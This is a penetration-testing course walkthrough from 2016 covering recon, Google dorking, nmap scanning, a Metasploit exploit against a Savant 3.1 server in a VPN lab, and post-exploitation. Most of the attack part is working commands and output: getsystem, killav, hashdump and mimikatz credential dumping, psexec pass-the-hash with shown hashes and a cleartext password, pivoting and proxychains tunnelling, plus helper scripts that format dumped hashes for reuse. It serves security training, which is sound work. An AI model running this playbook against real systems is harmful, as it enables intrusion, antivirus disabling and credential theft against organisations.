joemccray

New Advanced Pentester Night School 2016

Jan 4th, 2016
################################
# Pentester Night School 2016 #
# By Joe McCray #
################################


##########
# VMware #
##########
- For this workshop you'll need the latest version of VMware Workstation (Windows), Fusion (Mac), or Player.

- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.


##########################
# Download the attack VM #
##########################

VM for these labs
-----------------
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
user: strategicsec
pass: strategicsec   (this is also the sudo password you will be asked for throughout the labs)

---------------------------------------------------------------------------------------------------------------------------------





################################
# Tactical Pentest Methodology #
################################

The purpose of this section of the Pastebin document is to provide you with a tactical pentest plan.



-=-=-=-=-=- Phase 1 -=-=-=-=-=-


##########################################
# Step 1: External Target Identification #
##########################################
Find all of the IP ranges owned by your target company via the following websites:
- https://www.robtex.com/
- http://toolbar.netcraft.com/site_report

Look for weak SSL/TLS configurations (old protocol versions, weak cipher suites, certificate problems):
- https://www.ssllabs.com/ssltest/




#############################
# Step 2: Google Quick Hits #
#############################

Be thorough, and really look for vulnerabilities and data leakages that are relevant to what you learned while doing your OSINT work.
https://www.exploit-db.com/google-hacking-database/

Really good Google dorks to use (.pcf files are Cisco VPN client profiles and .ica files are Citrix connection files; both expose gateway addresses and group names, and sometimes stored credentials):
site:yourtarget.com filetype:pcf
site:yourtarget.com filetype:ica

1. Footholds:
-------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=1&ghdb_search_text=

Be sure to add 'site:yourtarget.com' to each dork you take from the category above.


2. Passwords:
-------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=9&ghdb_search_text=

Be sure to add 'site:yourtarget.com' to each dork you take from the category above.


3. Sensitive Directories:
-------------------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=3&ghdb_search_text=

Be sure to add 'site:yourtarget.com' to each dork you take from the category above.




Make sure that you do at least 50-100 different Google dorks. Do no less than 10 dorks per category.



###########################
# Step 3: Compromise Data #
###########################
Look to see if they have already been breached.

Search for the target company (and their major competitors) in the Data Breach Database:
http://www.privacyrights.org/data-breach

Put targetcompany.com in the search box of the site below to look for known defacements of the target's sites (Zone-H is a defacement archive):
http://zone-h.com/search

Replace targetcompany.com with your target domain name to look for known XSS vulnerabilities in the site:
http://xssed.com/search?key=targetcompany.com



##############################
# Step 4: Build OSINT Report #
##############################

Passive Recon
-------------
Install this add-on and enumerate as much info as possible:
- https://addons.mozilla.org/en-US/firefox/addon/passiverecon/


Next we build an OSINT report with the data gleaned from the previous steps. Here is a sample report:
https://s3.amazonaws.com/StrategicSec-Files/OSINT_Innophos_11242010.doc

We looked through this to get an idea not only of what is involved in doing passive recon, but of what the actual output of the work should look like.

---------------------------------------------------------------------------------------------------------------------------------

-=-=-=-=-=- Phase 2 -=-=-=-=-=-
##########################
# Download the attack VM #
##########################

VM for these labs
-----------------
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
user: strategicsec
pass: strategicsec


############################################
# Identifying External Security Mechanisms #
############################################

Flush the VM's own firewall rules first so nothing local interferes with the scans (the sudo password is strategicsec):

sudo /sbin/iptables -F

cd /home/strategicsec/toolz



###########################
# Target IP Determination #
###########################
cd /home/strategicsec/toolz
perl blindcrawl.pl -d targetcompany.com

-- Take each IP address and look it up here:
http://www.networksolutions.com/whois/index.jsp

cd ~/toolz/fierce2
fierce -dns targetcompany.com
cd ..



cd ~/toolz/
./ipcrawl 148.87.1.1 148.87.1.254          (reverse DNS lookup of every IP in the range)


sudo nmap -sL 148.87.1.0-255               (list scan: sends nothing to the targets, just does a reverse DNS lookup of each address)

sudo nmap -sL 148.87.1.0-255 | grep oracle


sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255     (pull host and domain names out of the SSL certificates)

Reference:
http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html

###########################
# Load Balancer Detection #
###########################
Here are some command-line options to use for identifying load balancers:

dig google.com                             (several A records, or answers that change between queries, point to DNS-based load balancing)

cd ~/toolz
./lbd-0.1.sh targetcompany.com


halberd targetcompany.com



######################################
# Web Application Firewall Detection #
######################################

cd ~/toolz/wafw00f
python wafw00f.py http://www.targetcompany.com

cd ~/toolz/
sudo nmap -p 80 --script http-waf-detect.nse targetcompany.com


---------------------------------------------------------------------------------------------------------------------------------

-=-=-=-=-=- Phase 3 -=-=-=-=-=-
Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.

So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
https://s3.amazonaws.com/StrategicSec-Files/Strategic-Security-2016-VPN-Info.pdf

sudo nmap -sP 10.0.0.0/24                  (ping sweep; -sP is the old spelling of -sn)

sudo nmap -sL 10.0.0.0/24

cd ~/toolz

wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

gcc ipcrawl.c -o ipcrawl

chmod +x ipcrawl

./ipcrawl 10.0.0.1 10.0.0.254



wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

gcc propecia.c -o propecia

sudo cp propecia /bin

propecia 10.0.0 22                         (quick single-port connect scan of 10.0.0.1-254)

propecia 10.0.0 3389

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'          (in -oG output $2 is the IP and $3 the reverse-DNS name in parentheses)

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt

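The one-line awk filters above only pull the host IP out of nmap's greppable output. The script below is an added example (not part of the course notes) that parses the full -oG "Ports:" field so you also get the port, protocol, service and version per open port, which is what you actually want when picking exploit targets. The sample -oG text is constructed for illustration; the hosts and services in it are assumptions, not lab data.

```sh
#!/bin/sh
# Added example: parse nmap greppable (-oG) output into "ip port/proto service version"
# lines. The sample below is constructed; only the "Savant httpd 3.1" banner comes from
# the course notes, the other hosts/services are made up for the demo.

SAMPLE_GNMAP='# Nmap 7.01 scan initiated Mon Jan  4 21:00:00 2016 as: nmap -Pn -sV -oG - -p 21,22,80,443,1433,3389 10.0.0.0/24
Host: 10.0.0.15 ()  Status: Up
Host: 10.0.0.15 ()  Ports: 21/closed/tcp//ftp///, 22/closed/tcp//ssh///, 80/open/tcp//http//Savant httpd 3.1/, 443/closed/tcp//https///, 1433/open/tcp//ms-sql-s//Microsoft SQL Server 2005/, 3389/open/tcp//ms-wbt-server///
Host: 10.0.0.20 (files.lab)  Status: Up
Host: 10.0.0.20 (files.lab)  Ports: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 5.3/  Ignored State: closed (4)
Host: 10.0.0.30 ()  Status: Down
# Nmap done at Mon Jan  4 21:02:00 2016 -- 256 IP addresses (2 hosts up) scanned in 120.00 seconds'

# open_ports: read -oG text on stdin, print one line per OPEN port:
#   <ip> <port>/<proto> <service> [<version>]
open_ports() {
    awk '
        /^Host:/ && /Ports:/ {
            ip = $2
            # keep only the comma-separated port records
            sub(/^.*Ports: /, "")
            sub(/[ \t]*Ignored State:.*$/, "")
            n = split($0, rec, ", ")
            for (i = 1; i <= n; i++) {
                # record layout: port/state/proto/owner/service/rpcinfo/version/
                split(rec[i], f, "/")
                if (f[2] != "open") continue
                line = ip " " f[1] "/" f[3] " " f[5]
                if (f[7] != "") line = line " " f[7]
                print line
            }
        }'
}

# live_hosts: unique IPs with at least one open port (what the notes save to labnet-ip-list.txt)
live_hosts() {
    open_ports | awk '{print $1}' | sort -u
}

# Demo on the constructed sample; with a real scan use:  nmap ... -oG - | open_ports
printf '%s\n' "$SAMPLE_GNMAP" | open_ports
```

Feed it a real scan with `nmap -Pn -sV -oG - -p ... 10.0.0.0/24 | open_ports`; the awk only looks at "Host:" lines that carry a "Ports:" field, so the "Status:" lines and the comment header are ignored.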
cd ~/toolz
wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
sudo cp wkhtmltoimage-i386 /usr/local/bin/

git clone https://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/
sudo cp http-screenshot.nse /usr/share/nmap/scripts/
sudo nmap --script-updatedb

cd ~/toolz/
mkdir labscreenshots
cd labscreenshots/

sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot -iL /home/strategicsec/labnet-ip-list.txt

(-iL already supplies the targets, so there is no need to also give 10.0.0.0/24 on the command line. The script drops one screenshot-nmap-<ip>:<port>.png per web server into the current directory.)



vi screenshots.sh

#!/bin/bash
# Build one HTML page showing every screenshot in the current directory.
# File names look like screenshot-nmap-10.0.0.15:80.png; the colon has to be
# URL-encoded (%3A) in the IMG SRC or the browser will not load the image.
printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
printf "</BODY></HTML>" >> labnet-port-80-screenshots.html





sh screenshots.sh




##########################
# Nmap NSE tricks to try #
##########################
sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24

sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24

sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24

sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24

sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24

sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24

sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute,oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24          (both scripts go in one comma-separated --script list)

sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24

sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24

sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24

sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24

sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24



####################################
# Finally, let's exploit something #
####################################

nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15

https://www.exploit-db.com/search

Search for:
Savant httpd 3.1
Apache httpd 2.0.58 ((Win32))


Found one written in Python:
https://www.exploit-db.com/exploits/18401/

Found one for Savant 3.1 from Metasploit:
https://www.exploit-db.com/exploits/16770/



cd ~/toolz/metasploit
./msfconsole
use exploit/windows/http/savant_31_overflow
set RHOST 10.0.0.15
set PAYLOAD windows/meterpreter/bind_nonx_tcp
set RPORT 80
set LPORT 7777
exploit

(A bind payload makes the target listen on LPORT and msfconsole connect to it, so nothing has to call back to you through the VPN. The nonx stager is the smaller variant that does not cope with DEP/NX; it is fine for an old target like this one.)




********************************** Figure out who and where you are **********************************

meterpreter> sysinfo


meterpreter> getuid


meterpreter> ipconfig


meterpreter> run post/windows/gather/checkvm


meterpreter> run get_local_subnets



********************************** Escalate privileges and get hashes **********************************


meterpreter> use priv          (loads the privilege extension; newer Meterpreters load it automatically)



meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

--------------------------------------------------------

meterpreter> run killav

meterpreter> run post/windows/gather/hashdump

Got the following admin hash (format is user:RID:LM hash:NTLM hash):
Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::

meterpreter> run post/windows/gather/credentials/credential_collector

meterpreter > load mimikatz

meterpreter > kerberos          (dumps the clear-text credentials LSASS holds for logged-on users)

This should give me the administrative password:
)K5?Jocb(Yx


********************************** Enumerate the host you are on **********************************

meterpreter> run winenum

meterpreter > run post/windows/gather/enum_applications

meterpreter > run post/windows/gather/enum_logged_on_users

meterpreter > run post/windows/gather/usb_history

meterpreter > run post/windows/gather/enum_shares

meterpreter > run post/windows/gather/enum_snmp

meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run          (programs started at logon, a common persistence spot)


********************************** Get out of Meterpreter **********************************

meterpreter> background

msf exploit(savant_31_overflow) > back

msf>




********************************** Lateral Movement *******************************


Now we can run the PSEXEC module with the credentials recovered above: first with the clear-text password, then with the LM:NTLM hash pair (pass-the-hash), which works even when the password itself could not be recovered.

-- Option 1 (clear-text password):
use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass )K5?Jocb(Yx

set RHOST 10.0.0.15

set payload windows/meterpreter/bind_tcp

set LPORT 2345

exploit

********************************** Get out of Meterpreter **********************************

meterpreter> background

msf exploit(psexec) > back

msf>

**********************************

-- Option 2 (pass-the-hash):
use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363

set payload windows/meterpreter/bind_tcp

set RHOST 10.0.0.15

set LPORT 5678

exploit



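The hashdump line in the "Escalate privileges" section and the SMBPass value in Option 2 above are the same data in two shapes. The script below is an added example (not from the course notes) that converts hashdump output into the LM:NTLM form psexec wants and flags the two cases a practitioner checks first: an NT hash of the empty password, and the "no LM hash stored" placeholder that means only the NT half is usable. The Administrator line is the one from the page; the Guest and svc_backup lines are constructed sample data (svc_backup's NT hash is the well-known hash of "password").

```sh
#!/bin/sh
# Added example: hashdump output -> pass-the-hash credentials.
# Only the Administrator line below is from the course notes; the other two are constructed.

HASHDUMP='Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::'

EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM field when no LM hash is stored (the default since Vista)
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty password

# pth_creds: read hashdump lines on stdin, print "<user> <LM>:<NT> <note>" where note is
#   empty-password  - NT hash is that of "", log in with a blank password
#   no-LM           - LM half is the placeholder; pass-the-hash still works with the NT half
#   ok              - a real LM hash is stored too (LM hashing enabled on this box)
pth_creds() {
    awk -F: -v elm="$EMPTY_LM" -v ent="$EMPTY_NT" '
        NF >= 4 && $2 ~ /^[0-9]+$/ && length($3) == 32 && length($4) == 32 {
            note = "ok"
            if ($4 == ent)      note = "empty-password"
            else if ($3 == elm) note = "no-LM"
            print $1, $3 ":" $4, note
        }'
}

# smbpass_for USER: the value to paste after "set SMBPass" in exploit/windows/smb/psexec
smbpass_for() {
    pth_creds | awk -v u="$1" '$1 == u { print $2 }'
}

# Demo on the sample; with a real dump:  cat hashes.txt | pth_creds
printf '%s\n' "$HASHDUMP" | pth_creds
```

Lines that are not in user:RID:LM:NT form (hashdump status messages, blank lines) are skipped by the field checks in the awk pattern, so you can pipe the raw module output straight in.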
********************************** Set up your Pivot **********************************

meterpreter > background
<-- background the session
You want to get back to this prompt:
msf exploit(handler) > back <--- you need to get to the main msf> prompt



sessions -l <-- find the session you want to pivot through (note the IP and session number)

Now set up the pivot with a route add
-------------------------------------

route print <--- should be blank

route add 10.0.0.0 255.255.255.0 1 <-- arguments are network, netmask, session id. Use the session id shown by sessions -l (it may be 1, 2, 3 or 4), and make sure you are at the msf> prompt, not meterpreter


route print <----- verify the new route

******************************Scan through your Pivot ******************************

use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot

set THREADS 10

set RHOSTS 10.0.0.0/24 <-- Keep changing this range and re-running the scan until you find something you want to attack

set PORTS 445

run


####################################
# Socks Tunneling with Proxychains #
####################################
--- Open a duplicate putty session to your Ubuntu host

sudo apt-get install -y proxychains

sudo vi /etc/proxychains.conf <--- Make sure that the last line of the file is: socks4 127.0.0.1 1080

Comment out the proxy_dns line (otherwise every name lookup is pushed through the proxy as well), change the default Tor entry's port 9050 to the Metasploit socks proxy port (1080), and save it:
socks4 127.0.0.1 1080
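The same two edits can be scripted instead of done in vi. The block below is an added example (not part of the course notes) that makes them with sed on a copy of the file and then checks the result, so you can confirm the config is right before touching /etc/proxychains.conf. The starting file is a constructed excerpt of a stock proxychains.conf (Tor entry on 9050, proxy_dns enabled).

```sh
#!/bin/sh
# Added example: script the proxychains.conf changes (comment out proxy_dns, repoint the
# socks4 entry at Metasploit's socks4a port) and verify them. CONF_ORIG is a constructed
# excerpt of the stock config, not the file from the course VM.

CONF_ORIG='# proxychains.conf  VER 3.1
strict_chain
# Proxy DNS requests - no leak for DNS data
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
# defaults set to "tor"
socks4  127.0.0.1 9050'

# fix_proxychains_conf FILE PORT: comment out proxy_dns and point the socks4 entry
# at 127.0.0.1:PORT. Written without sed -i so it behaves the same on every sed.
fix_proxychains_conf() {
    file=$1
    port=$2
    sed -e 's/^proxy_dns[[:space:]]*$/#proxy_dns/' \
        -e "s/^socks4[[:space:]]\{1,\}127\.0\.0\.1[[:space:]]\{1,\}9050[[:space:]]*\$/socks4 127.0.0.1 $port/" \
        "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# check_proxychains_conf FILE PORT: succeed only if proxy_dns is off and the last line
# is exactly the socks4 entry the course asks for.
check_proxychains_conf() {
    file=$1
    port=$2
    ! grep -q '^proxy_dns' "$file" || return 1
    [ "$(tail -n 1 "$file")" = "socks4 127.0.0.1 $port" ]
}

# Demo on a temp copy; on the VM the real target is /etc/proxychains.conf (run the fix with sudo).
tmp=$(mktemp)
printf '%s\n' "$CONF_ORIG" > "$tmp"
fix_proxychains_conf "$tmp" 1080
check_proxychains_conf "$tmp" 1080 && cat "$tmp"
rm -f "$tmp"
```

Run the check again after any later edit: proxychains uses the ProxyList in order, so a stray second socks4 line (for instance the Tor default left in place) sends traffic somewhere you did not intend.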
***************************Set up a Socks Proxy through your Pivot *************************

--- In the msfconsole session (the one with the meterpreter shell), start the socks server:

use auxiliary/server/socks4a

set SRVHOST 127.0.0.1

set SRVPORT 1080

run

--- Go back to your duplicate putty session and run the scans through the proxy:
cd ~

proxychains nmap -sT -Pn -n -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24 <--- This is going to be really slow

proxychains nmap -sT -Pn -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0.0/24 <--- This is going to be really slow

(Use -sT: only full TCP connect scans go through a SOCKS proxy, raw-packet scans such as -sS bypass it. -Pn and -n matter too, since ping probes and DNS lookups would not be proxied either. Only subnets you added with route add are sent through the pivot; anything else goes out directly.)


---close the duplicate putty session to your Ubuntu host